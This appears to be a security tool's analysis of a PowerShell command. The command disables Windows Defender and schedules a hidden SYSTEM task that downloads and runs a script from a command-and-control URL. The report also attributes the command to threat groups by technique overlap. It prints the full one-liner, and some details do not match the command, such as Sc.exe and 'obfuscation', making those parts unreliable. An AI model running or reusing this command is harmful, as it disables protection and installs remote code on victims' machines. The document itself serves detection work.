Malicious — high-confidence attack behavior
Multiple corroborating attack signals: Dropper, Loader, Defense Evasion.
powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; schtasks /create /tn 'WindowsSecurityHealth' /tr 'powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('hxxp://c2.telemetry-svc[.]com/agent.ps1'))' /sc onlogon /ru SYSTEM /f"Uses PowerShell to disable Windows Defender real-time protection, download content from `c2.telemetry-svc.com`, and execute the payload as PowerShell code.
The command leverages Powershell.exe, Schtasks.exe, and Sc.exe, a Windows set of binaries catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: ADS and Execute.
1 network indicator were extracted (0 IPs, 1 URL) and returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
All indicators appear clean across queried sources.
Iranian group targeting aerospace, energy, and petrochemical industries. Associated with destructive Shamoon malware variants and password spraying campaigns.
Russia-based cybercriminal group operating TrickBot, Ryuk, Conti, and BazarLoader. One of the most prolific ransomware operators targeting hospitals and critical infrastructure.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Russian GRU Unit 74455 group responsible for NotPetya, attacks on Ukrainian power grid, and Olympic Destroyer. Focuses on destructive operations.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.